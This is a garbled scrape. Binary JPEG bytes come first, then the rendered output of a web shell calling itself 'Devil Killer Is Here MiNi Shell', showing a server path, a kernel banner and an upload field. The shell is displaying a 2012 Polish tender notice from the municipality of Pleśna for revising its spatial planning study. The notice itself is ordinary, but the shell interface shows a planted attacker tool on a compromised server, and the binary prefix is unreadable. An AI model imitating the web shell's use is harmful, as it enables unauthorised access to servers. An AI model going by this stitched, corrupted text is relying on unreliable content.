JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120807/288316-N-2012.html

<p class="kh_header"><b>Pleśna: Przygotowanie i opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Pleśna</b><br>
<b>Numer ogłoszenia: 288316 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pleśna , Pleśna 240, 33-171 Pleśna, woj. małopolskie, tel. 014 6798170, faks 014 6798947.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plesna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie i opracowanie projektu zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Pleśna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przygotowanie i opracowanie projektu zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Pleśna w woj. małopolskim na obszarze o powierzchni  8360ha, w tym wykonanie opracowań poprzedzających prace planistyczne oraz udział w czynnościach związanych ze sporządzeniem zmiany studium zgodnie z ustawą z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr80 poz. 717 z późn. zm.).
2.Zakres i Problematyka Opracowania  Studium :
A. DANE PODSTAWOWE. 
1. Podstawa opracowania:
Uchwała nr VIII/64/11 Rady Gminy w Pleśnej  z dnia 28 czerwca 2011 roku w sprawie przystąpienia do sporządzania zmian Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego  Gminy Pleśna
2. Obszar i granice opracowania:
a) granice zmian studium obejmują granice administracyjne gminy Pleśna
b) powierzchnia opracowania zmiany studium -  8 360 ha
Przedmiot opracowania:
Przedmiotem umowy jest opracowanie kompletnej z punktu widzenia obowiązujących przepisów prawa, dokumentacji pn. Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Pleśna - zwanej w dalszej części Studium w tym wykonanie opracowań poprzedzających prace planistyczne, według procedur i problematyki określonych:
w ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.), zwanej dalej ustawą,
w rozporządzeniu Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164 poz. 1587),
w rozporządzeniu Prezesa Rady Ministrów z dnia 20 czerwca 2002 r. w sprawie Zasad techniki prawodawczej (Dz. U. Nr 100 poz. 908) oraz w ustawach i przepisach odrębnych,   odnoszących się do planowania i zagospodarowania przestrzennego oraz zgodnie z wymogami:
ustawy z dnia 3 października 2008 roku o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U.  nr 199 poz. 1227 z późn. zm.)
rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 roku w sprawie zakresu    projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz. U.  Nr 118 poz. 1233) oraz innymi stosownymi rozporządzeniami w tym zakresie;
4.Charakterystyka i informacje dotyczące obszaru opracowania:
Teren, dla którego jest przewidywane opracowanie zmiany studium stanowi obszar 11 wsi o łącznej powierzchni 8 360 ha. Studium uwarunkowań i kierunków zagospodarowania przestrzennego Gminy Pleśna zostało podjęte Uchwałą nr XXVII/208/2002 Rady Gminy  Pleśnej z dnia 22 kwietnia 2002 roku. Cały obszar gminy Pleśna pokryty jest miejscowym planem zagospodarowania. Aktualnie obowiązuje 1 miejscowy plan dla całości gminy. Załącznik graficzny do planu sporządzony został w skali 1:2000. Na terenie gminy występują tereny osuwiskowe, zalewowe, teren gminy położony jest w całości w obszarze Chronionego Krajobrazu Pogórza Ciężkowickiego  oraz  częściowo  Natura 2000 .
B. ZAKRES OPRACOWANIA
STUDIUM
1. Opracowanie ekofizjograficzne dla studium uwarunkowań i kierunków zagospodarowania   przestrzennego gminy Pleśna, opracowane zgodnie z rozporządzeniem Ministra Środowiska z dnia 9 września 2002 roku w sprawie opracowań ekofizjograficznych (Dz. U. Nr 155 poz. 1298 z 2002 r.),
2. Projekt zmiany studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy Pleśna, zgodnie z ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z 2003 r. z późniejszymi zmianami) wraz ze sporządzeniem prognozy oddziaływania na środowisko oraz przeprowadzeniem strategicznej oceny oddziaływania na środowisko dla tego studium zgodnie z ustawą z dnia 3
października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko
(Dz.U. 199 poz. 1227 z 2008 r. z późniejszymi zmianami). W ramach niniejszej zmiany studium należy wykonać nowe opracowanie tego dokumentu w pełnym zakresie terenowym i przedmiotowym. Opracowanie należy wykonać w wersji cyfrowej w programie EW-Mapa. Obszar będący przedmiotem opracowania ekofizjografii i zmiany studium obejmuje całą gminę Pleśna w jej granicach administracyjnych tj. obszar o powierzchni 8 360 ha.
3.Opracowanie ekofizjograficzne, o którym mowa w pkt. 1. powinno zawierać część tekstową oraz graficzną i w części opisowej i kartograficznej powinno obejmować problematykę określoną w rozporządzeniu Ministra Środowiska z dnia 9 września 2002 roku w sprawie opracowań ekofizjograficznych ( Dz. U. Nr 155 poz. 1298 z 2002 r.). Opracowanie winno się składać z części kartograficznej, wykonanej na mapie topograficznej w skali 1:10 000 pozyskanej z państwowego zasobu geodezyjnego oraz w programie EW-Mapa.
4.Projekt zmiany studium, o którym mowa w pkt. 1 powinien zawierać część tekstową i graficzną sporządzoną na mapie topograficznej w skali 1:10 000 pozyskanej przez Wykonawcę na swój koszt z państwowego zasobu geodezyjnego. Projekt zmiany studium powinien uwzględniać wymagania wynikające z: - ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym Dz. U. z 2003 r. Nr 80, poz. 717, ze zmianami ), - rozporządzenia Ministra Infrastruktury z dnia 28 kwietnia 2004 r. w sprawie zakresu projektu studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy (Dz.U.Nr 118 poz.1233 z 2004 r.), - ustawy z 3.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U. Nr 199, poz. 1227 ze zmianami).
Wykonawca zamówienia zobowiązany jest do przygotowania projektów korespondencji, wykazów, w tym również wykazów koniecznych wniosków, opinii i uzgodnień, wzorów ogłoszeń i obwieszczeń oraz innych dokumentów, których potrzeba wyłoni się w trakcie opracowania projektu zmiany Studium i przekazywania ich Zamawiającemu.
Wykonawca zamówienia odpowiedzialny jest za pozytywne uzgodnienia projektu zmiany Studium przez właściwe organy, w zakresie wynikającym z rzetelności realizacji przedmiotu zamówienia.
W zakresie przedmiotu zamówienia jest również udział Wykonawcy w posiedzeniach Komisji, sesjach rady Gminy, spotkaniach z Wójtem Gminy Pleśna  i innych spotkaniach, których konieczność wyniknie w trakcie procedury planistycznej, udział w dyskusjach publicznych zorganizowanych w czasie wyłożenia studium do publicznego wglądu.
Zakres prac planistycznych obejmujących zamówienie jak w pkt. 1. powinien uwzględniać zalecenia zawarte w Ocenie aktualności studium uwarunkowań i kierunków zagospodarowania przestrzennego i miejscowych planów zagospodarowania przestrzennego gminy Pleśna  z maja 2011 roku.
Sporządzenie prognozy oddziaływania na środowisko winno być poprzedzone uzgodnieniem, z właściwymi organami, stopnia szczegółowości informacji w niej zawartych i zgodne z wymogami ustawy z dnia 3.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz.U.  Nr 199, poz. 1227 ze zmianami).
C.  FORMA OPRACOWANIA.
Zamówienie obejmuje wykonanie i dostarczenie Zamawiającemu do jego siedziby, to jest do Urzędu Gminy w Pleśnej , przedmiotu zamówienia w następujących formach:
1.Opracowanie ekofizjograficzne: - dwa egzemplarze ekofizjografii w wersji drukowanej i elektronicznej (2 płyty CD); - rysunki, mapy w wersji kolorowej o rozdzielczości min. 300DPI (do odczytu plików jpg, png, i wydruku części tekstowej doc, pdf, rtf, odt.) oraz w wersji elektronicznej w oparciu o program EW-Mapa10.
2.Prognoza oddziaływania na środowisko: - dwa egzemplarze prognozy oddziaływania na środowisko w wersji drukowanej i dwa w wersji elektronicznej (2 płyty CD); - rysunki, mapy w wersji kolorowej o rozdzielczości min. 300DPI (do odczytu plików .jpg i wydruku części tekstowej .doc, pdf, rtf, odt.) oraz w wersji elektronicznej w oparciu o program EW-Mapa.
3.Studium uwarunkowań i kierunków zagospodarowania przestrzennego: - dwa kolorowe egzemplarze planszy rysunku studium w skali 1:10 000, zafoliowany lub wydrukowany na foli, oprawiony w listwy, przystosowany do zawieszenia na ścianie; - cztery egzemplarze część tekstowa i graficzna w formie książkowej A-4 (w kolorze); - część tekstowa i graficzna w wersji elektronicznej (3 płyty CD) o rozdzielczości min. 300DPI (do odczytu plików.jpg i wydruku części tekstowej .doc, pdf, rtf, odt.) ;
4.Dokumentacja planistyczna: - komplet dokumentacji planistycznej dokumentującej tok formalno-prawny, którą należy opracować w jednym egzemplarzu w oryginale i dwóch egzemplarzach w kopii.
5.Wykonawca w chwili podpisania ostatniego protokołu zdawczo - odbiorczego przenosi na rzecz Zamawiającego całości praw autorskich i praw pokrewnych.
6.Kod Wspólnego Słownika Zamówień (CPV) 71410000-5 Usługi planowania przestrzennego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku odbędzie się na podstawie: 
a) oświadczenia określonego w punkcie 6.1.1 - zał.  Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wymaga się od Wykonawcy wykazania wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch usług w zakresie opracowań urbanistycznych, polegających na wykonaniu lub zmianie  studium uwarunkowań i kierunków zagospodarowania przestrzennego w pełnym zakresie,  dla obszaru nie mniejszego niż 8000ha. Do oferty należy dołączyć dokumenty potwierdzające należyte wykonanie zamówienia ( np. referencje).  -wg zał. Nr 6 do SIWZ 

Ocena spełnienia warunku odbędzie się na podstawie: -zał. Nr6 do SIWZ oraz oświadczenia określonego w punkcie 6.1.1 - zał.  Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku odbędzie się na podstawie: 
a) oświadczenia określonego w punkcie 6.1.1 - zał.  Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymaga się od Wykonawcy   dysponowania co najmniej pięcioosobowym zespołem, który będzie uczestniczył w wykonywaniu zamówienia, w tym: 
3.1.	minimum jedną osobą posiadającą kwalifikacje do kierowania pracami planistycznymi (główny projektant Studium). Główny projektant Studium winien posiadać aktualny wpis na listę członków właściwej izby samorządu zawodowego urbanistów, zgodnie z art. 5 ustawy o planowaniu oraz art. 2 ust. 3 i art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) lub posiadać równoważne kwalifikacje w rozumieniu przepisów europejskich (dotyczy Wykonawców z obszaru Unii Europejskiej), oraz posiadać doświadczenie w wykonaniu co najmniej dwóch Studiów Uwarunkowań i Kierunków Zagospodarowania Przestrzennego lub zmian Studiów w pełnym zakresie dla gminy o powierzchni minimum 8 000 ha.
3.2.	minimum jedną osobę posiadającą kwalifikacje do samodzielnego projektowania przestrzeni (projektant Studium). Projektant Studium winien posiadać aktualny wpis na listę członków właściwej izby samorządu zawodowego urbanistów, zgodnie z art. 5 ustawy o planowaniu oraz art. 2 ust. 3 i art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. 2001, Nr 5, poz. 42 z późn. zm.) lub posiadać równoważne kwalifikacje w rozumieniu przepisów europejskich (dotyczy Wykonawców z obszaru Unii Europejskiej), oraz posiadać doświadczenie w wykonaniu co najmniej jednego Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego lub zmiany Studium w pełnym zakresie dla terenu o powierzchni minimum 8 000 ha.
3.3.	minimum jedną osobą o specjalności komunikacja, posiadającą doświadczenie w wykonaniu co najmniej dwóch opracowań z zakresu problematyki Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego lub zmiany Studium dla obszaru o powierzchni min. 8 000 ha.
3.4.	minimum jedną osobą o specjalności ochrona środowiska, posiadającą doświadczenie w wykonaniu co najmniej dwóch opracowań z zakresu problematyki Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego lub zmiany Studium dla obszaru o powierzchni min. 8 000 ha.
3.5.	minimum jedną osobą, która wykona opracowania ekofizjograficzne posiadającą doświadczenie w sporządzeniu co najmniej dwóch opracowań ekofizjograficznych dla obszaru o powierzchni min. 8 000 ha.
Dopuszcza się łączenie funkcji  przez jedną osobę  pod warunkiem, że osoba ta będzie posiadała wymagane kwalifikacje i doświadczenie. 


Ocena spełnienia warunku odbędzie się na podstawie: 
a) oświadczenia określonego w punkcie 6.1.1 - zał. Nr 2 do SIWZ, załącznika nr 4  do SIWZ oraz załączą oświadczenie, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia-   wg załącznika nr 5 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku odbędzie się na podstawie: 
a) oświadczenia określonego w punkcie 6.1.1 - zał.  Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.3.1. Wypełniony formularz oferty - zgodnie z zał. Nr 1 do SIWZ.
6.3.2. Dokumenty wymienione w pkt 6.1 i 6.2.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z wybranym wykonawcą zamawiający podpisze umowę na warunkach określonych we wzorze umowy stanowiącym załącznik nr  7 do SIWZ.
2. Zmiany postanowień zawartej umowy wymaga formy pisemnej  w postaci aneksu pod rygorem nieważności. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ustawy Prawo zamówień publicznych.
3. Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy, w przypadku wystąpienia w trakcie realizacji zawartej umowy jednej z następujących okoliczności:
3.1. zmiany dotyczące podwykonawców i powierzonego im zakresu prac;
3.2. zmiana terminu zakończenia realizacji zamówienia w przypadku zaistnienia następujących okoliczności:
a) w przypadku ponowienia czynności planistycznych w wyniku uzyskania negatywnych opinii i uzgodnień,
b) w przypadku ponowienia czynności planistycznych w wyniku rozpatrzenia uwag przez Wójta Gminy Pleśna,
c) w przypadku ponowienia czynności, w związku ze stwierdzeniem przez Radę Gminy Pleśna, na podstawie art. 19 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.) konieczności dokonania zmian w przedstawionym do uchwalenia projekcie planu, 
d) w przypadku ponowienia czynności w związku z zaistnieniem okoliczności, o których mowa w art. 28 ust. 2 ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. Nr 80 poz. 717 z późn. zm.) 
e) w przypadku zmiany przepisów powszechnie obowiązujących, w tym m.in. dotyczących przedmiotu umowy oraz w przypadku konieczności koordynacji działań z przygotowaniem inwestycji o znaczeniu strategicznym z innymi projektowanymi i obowiązującymi miejscowymi planami zagospodarowania przestrzennego oraz studium uwarunkowań i kierunków zagospodarowania przestrzennego,
f) w przypadku zmian wynikających z podjętych przez Radę Gminy Pleśna uchwał oraz wniosków komisji Rady; 
3.3 zmiana osób wymienionych w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, pod warunkiem posiadania przez następców tych osób doświadczenia i uprawnień, co najmniej równoważnych doświadczeniu i uprawnieniom wskazanych w warunkach udziału w postępowaniu o udzielenie zamówienia publicznego. Zmiana osób może być dokonana w przypadkach: śmierci, choroby lub innych zdarzeń losowych, niewywiązywania się z powierzonych obowiązków lub gdy zmiana stanie się konieczna 
